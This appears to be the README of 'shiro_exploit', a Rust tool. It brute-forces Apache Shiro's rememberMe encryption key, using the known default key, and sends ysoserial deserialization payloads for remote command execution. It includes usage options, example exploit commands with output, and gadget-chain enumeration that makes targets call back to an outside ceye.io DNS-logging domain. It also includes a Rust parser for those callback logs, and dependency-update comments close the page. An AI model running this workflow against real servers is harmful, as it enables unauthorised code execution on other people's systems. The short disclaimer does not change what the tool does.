apache-shiro-exploit

Overview

shiro_exploit brute-forces the AES key Apache Shiro uses to encrypt its rememberMe cookie (default kPH+bIxk5D2deZiIxcaaaA==, in CBC or GCM mode) and, once a key is confirmed, delivers Java deserialization payloads generated by ysoserial to the target.

Disclaimer: the techniques, ideas and tools in this document are provided solely for security research and educational exchange. Nobody may use them for illegal purposes or for profit; anyone who does so bears the consequences alone.

Usage

~ shiro_exploit --help
Usage: shiro_exploit [--key <key>] [-m <mode>] [-t <target>] [-s <ser>] [--file <file>] [--keys <keys>] [--csv <csv>] [--proxy <proxy>] [--timeout <timeout>] [--thread <thread>] [--chain] [--exploit] [--dns <dns>] [-p <payload>] [-c <command>] [--echo-name <echo-name>] [--command-name <command-name>] [-l]

shiro_exploit

Options:
  --key             you can specify known keys
  -m, --mode        apache-shiro encryption algorithm,default: CBC
  -t, --target      the target
  -s, --ser         serialize file
  --file            read the target from the file
  --keys            read the key from the file
  --csv             export to the csv file
  --proxy           proxy to use for requests
                    (ex:[http(s)|socks5(h)]://host:port)
  --timeout         set request timeout
  --thread          number of concurrent threads
  --chain           enum chain mode
  --exploit         exploit mode
  --dns             dns identifier, default: 981tzg.ceye.io
  -p, --payload     select a payload
  -c, --command     command to execute
  --echo-name       tomcat echo request header name
  --command-name    tomcat command request header name
  -l, --list        list all payload
  --help            display usage information

Parameter details

  • --key specifies the key; default kPH+bIxk5D2deZiIxcaaaA== (Shiro's well-known hardcoded default)
  • -m selects the encryption mode; default CBC, GCM also available
  • -t a single target
  • -s reads a file generated by ysoserial and uses it as the payload
  • --file reads targets from a file
  • --keys reads keys from a file
  • --csv exports the results to a CSV file
  • --exploit exploit mode: once a key has been brute-forced, the ysoserial-generated file is read in as the payload; if --ser is empty, a URL_DNS payload (ysoserial's URLDNS gadget) is generated with --dns as its parameter
  • --dns the DNS logging domain used for verification. The target resolves a name under this domain that encodes its host and port (prefixed with the chain name in --chain mode, e.g. bs1.127.0.0.1.8080.981tzg.ceye.io in the records below). The default, 981tzg.ceye.io, is the author's own ceye.io identifier: always pass your own domain, otherwise the callbacks are logged in somebody else's account and you see nothing
  • -p uses a built-in payload, together with -c or with --dns / --echo-name / --command-name; the Tomcat echo payload will be added in a later update
  • -l lists the built-in payloads
  • --chain enumerates gadget chains; read the result from your DNS logging service, where the prefix of each recorded name is the chain name

Using a ysoserial file

~ shiro_exploit -t http://127.0.0.1:8080 --exploit --ser /home/kali-team/1.ser                 
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
| url                                                                     | method | verify | mode | key                      |
+=========================================================================+========+========+======+==========================+
| http://127.0.0.1:8080/login;jsessionid=EAEAD8C3FA8884D816F575E55B654694 | GET    | true   | CBC  | kPH+bIxk5D2deZiIxcaaaA== |
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+

Verifying the vulnerability with DNS records

~ shiro_exploit -t http://127.0.0.1:8080 --exploit --dns 981tzg.ceye.io
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
| url                                                                     | method | verify | mode | key                      |
+=========================================================================+========+========+======+==========================+
| http://127.0.0.1:8080/login;jsessionid=E01994D45911DE55FCE6606CFFF48AC7 | GET    | true   | CBC  | kPH+bIxk5D2deZiIxcaaaA== |
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+

Enumerating gadget chains

  • Each chain's payload runs a ping whose hostname is the chain name prepended to the DNS prefix; if that name shows up in your DNS records, the chain works on the target. This only confirms chains on targets that have a ping command and outbound DNS resolution; a chain that is present but cannot resolve externally will not appear, and its absence does not rule it out.
~ shiro_exploit -t http://127.0.0.1:8080 --exploit --dns 981tzg.ceye.io --chain
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
| url                                                                     | method | verify | mode | key                      |
+=========================================================================+========+========+======+==========================+
| http://127.0.0.1:8080/login;jsessionid=E01994D45911DE55FCE6606CFFF48AC7 | GET    | true   | CBC  | kPH+bIxk5D2deZiIxcaaaA== |
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
  • Reading the DNS records gives the usable chains: bs1, cck3, cc5, cc7, cck1 and cc6. The mixed-case entries (ccK3, cCK3) are the same cck3 chain: some resolvers randomise the case of query names (DNS 0x20), so compare names case-insensitively rather than counting them as separate chains.
969227011	bs1.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:20
969226980	bs1.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:19
969226976	ccK3.127.0.0.1.8080.981tZG.cEYE.Io	127.0.0.1	2022-12-22 13:48:19
969226947	cc5.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:18
969226945	cc7.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:18
969226936	cCK3.127.0.0.1.8080.981tzg.ceyE.iO	127.0.0.1	2022-12-22 13:48:18
969226932	cck1.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:18
969226818	cc6.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:14
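To turn a DNS-logging export like the one above into a chain list mechanically, here is an added Rust example; it is not code from the shiro_exploit project. It builds the probe name the records show (`<chain>.<host>.<port>.<dns-domain>`, a layout inferred from this page's output rather than read from the tool's source), parses tab-separated records, folds case so resolver 0x20 randomisation does not split one chain into several, ignores traffic for other domains, and returns the de-duplicated chain set. `SAMPLE_LOG` is the page's records plus two constructed lines: one for an unrelated domain and one malformed record.

```rust
// Added example, not part of shiro_exploit. Recovers the usable gadget-chain
// set from a DNS-logging export such as the one shown above. The record layout
// (<chain>.<host>.<port>.<dns-domain>) is inferred from the page's output, not
// read from the tool's source, and SAMPLE_LOG is the page's records plus two
// constructed lines (an unrelated domain and a malformed line).
use std::collections::BTreeSet;

/// Probe name a --chain payload resolves for one gadget chain against one target.
pub fn probe_name(chain: &str, host: &str, port: u16, dns_domain: &str) -> String {
    format!("{}.{}.{}.{}", chain, host, port, dns_domain).to_ascii_lowercase()
}

/// One confirmed chain, with the target that resolved it.
#[derive(Debug, Clone, PartialEq, Eq, PartialOrd, Ord)]
pub struct ChainHit {
    pub chain: String,
    pub target: String, // "host:port"
}

/// Parse tab-separated records "<id>\t<queried name>\t<resolver ip>\t<time>" and
/// return every (chain, target) pair that queried a name under `dns_domain`.
pub fn usable_chains(log: &str, dns_domain: &str) -> BTreeSet<ChainHit> {
    let suffix = format!(".{}", dns_domain.to_ascii_lowercase());
    let mut hits = BTreeSet::new();
    for line in log.lines() {
        let name = match line.split('\t').nth(1) {
            Some(n) => n.trim().to_ascii_lowercase(), // fold DNS 0x20 case randomisation
            None => continue,                          // malformed record
        };
        // Only records for our domain count; other traffic in the log is ignored.
        let prefix = match name.strip_suffix(suffix.as_str()) {
            Some(p) => p,
            None => continue,
        };
        // prefix is <chain>.<host>.<port>. The host may contain dots (an IPv4
        // address), so peel the chain off the front and the port off the back.
        let (chain, rest) = match prefix.split_once('.') {
            Some(x) => x,
            None => continue,
        };
        let (host, port) = match rest.rsplit_once('.') {
            Some(x) => x,
            None => continue,
        };
        if chain.is_empty() || host.is_empty() || port.parse::<u16>().is_err() {
            continue;
        }
        hits.insert(ChainHit {
            chain: chain.to_string(),
            target: format!("{}:{}", host, port),
        });
    }
    hits
}

/// Distinct chain names, sorted, ready to feed back into `-p`.
pub fn chain_names(hits: &BTreeSet<ChainHit>) -> Vec<String> {
    hits.iter()
        .map(|h| h.chain.clone())
        .collect::<BTreeSet<String>>()
        .into_iter()
        .collect()
}

/// The page's DNS records plus two constructed lines (unrelated domain, malformed).
pub const SAMPLE_LOG: &str = concat!(
    "969227011\tbs1.127.0.0.1.8080.981tzg.ceye.io\t127.0.0.1\t2022-12-22 13:48:20\n",
    "969226980\tbs1.127.0.0.1.8080.981tzg.ceye.io\t127.0.0.1\t2022-12-22 13:48:19\n",
    "969226976\tccK3.127.0.0.1.8080.981tZG.cEYE.Io\t127.0.0.1\t2022-12-22 13:48:19\n",
    "969226947\tcc5.127.0.0.1.8080.981tzg.ceye.io\t127.0.0.1\t2022-12-22 13:48:18\n",
    "969226945\tcc7.127.0.0.1.8080.981tzg.ceye.io\t127.0.0.1\t2022-12-22 13:48:18\n",
    "969226936\tcCK3.127.0.0.1.8080.981tzg.ceyE.iO\t127.0.0.1\t2022-12-22 13:48:18\n",
    "969226932\tcck1.127.0.0.1.8080.981tzg.ceye.io\t127.0.0.1\t2022-12-22 13:48:18\n",
    "969226818\tcc6.127.0.0.1.8080.981tzg.ceye.io\t127.0.0.1\t2022-12-22 13:48:14\n",
    "1\tcc5.10.0.0.5.8443.other.example\t10.0.0.5\t2022-12-22 13:48:00\n", // constructed
    "malformed record without tabs\n",                                        // constructed
);

fn main() {
    let hits = usable_chains(SAMPLE_LOG, "981tzg.ceye.io");
    for h in &hits {
        println!("{} confirmed on {}", h.chain, h.target);
    }
    println!("usable chains: {}", chain_names(&hits).join(", "));
}
```

Running it against the sample yields the six chains the page lists, each attributed to 127.0.0.1:8080; the cck3 duplicates collapse because case is folded before the set insert, and the `other.example` line is dropped by the domain check rather than being mistaken for a hit.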

Using the built-in ysoserial payloads

~ shiro_exploit -t http://127.0.0.1:8080 --exploit -p cck1 -c "ping qq.com"                                    
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
| url                                                                     | method | verify | mode | key                      |
+=========================================================================+========+========+======+==========================+
| http://127.0.0.1:8080/login;jsessionid=5FAF1087D2448C017C2959B2AC02CDAF | GET    | true   | CBC  | kPH+bIxk5D2deZiIxcaaaA== |
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+

Comments
  • Update prettytable-rs requirement from 0.9.0 to 0.10.0

    Updates the requirements on prettytable-rs to permit the latest version.

    Release notes

    Sourced from prettytable-rs's releases.

    v0.10.0

    Fixed

    • Fix panic due to incorrect ANSI escape handling #137
    • Fix display of empty tables #127

    Changed

    • Remove the unsafe code in Table::as_ref #146
    • Switch atty to is-terminal #151
    • Minimal Supported Rust Version bumped to 1.56

    Thanks

    #127: phsym/prettytable-rs#127 #137: phsym/prettytable-rs#137 #145: phsym/prettytable-rs#145 #146: phsym/prettytable-rs#146 #151: phsym/prettytable-rs#151

    dependencies 
    opened by dependabot[bot] 0
  • Update select requirement from 0.5.0 to 0.6.0

    Updates the requirements on select to permit the latest version.

    Commits
    • 32b3b25 0.6.0
    • e07725c upgrade to actions/checkout@v3 and switch to dtolnay/rust-toolchain
    • 3c8485e Merge pull request #72 from phimuemue/debug_impl
    • 909a4d8 remove the notice from readme
    • 6566da9 undo the recently made breaking changes in 0.6.0-alpha.1
    • df624f5 Merge pull request #73 from Billy-Sheppard/updated-deps
    • 8755d6d edition 2021
    • 59e8734 updated deps
    • b13ba72 warn about missing Debug implementations
    • 1fb7bc8 impl Debug for Iter
    • Additional commits viewable in compare view

    dependencies 
    opened by dependabot[bot] 0
  • Update uuid requirement from 0.8 to 1.2

    Updates the requirements on uuid to permit the latest version.

    Release notes

    Sourced from uuid's releases.

    1.2.2

    What's Changed

    Full Changelog: https://github.com/uuid-rs/uuid/compare/1.2.1...1.2.2

    Commits
    • 60ca9af Merge pull request #646 from uuid-rs/cargo/1.2.2
    • d413ed6 prepare for 1.2.2 release
    • ce445a2 Merge pull request #645 from uuid-rs/fix/extern-alloc
    • b7c845f remove extern crate alloc
    • f5a29cf Merge pull request #640 from uuid-rs/ci/cleanups
    • 876e466 remove missing moniker from job names
    • 6944c0d simplify CI and unpin arbitrary
    • b87760d Merge pull request #637 from KodrAus/cargo/1.2.1
    • b21f0cb prepare for 1.2.1 release
    • cac99f5 Merge pull request #636 from KodrAus/fix/v1-breakage
    • Additional commits viewable in compare view

    dependencies 
    opened by dependabot[bot] 0
Owner

EMOCAT (三米前有蕉皮): small tools written in Rust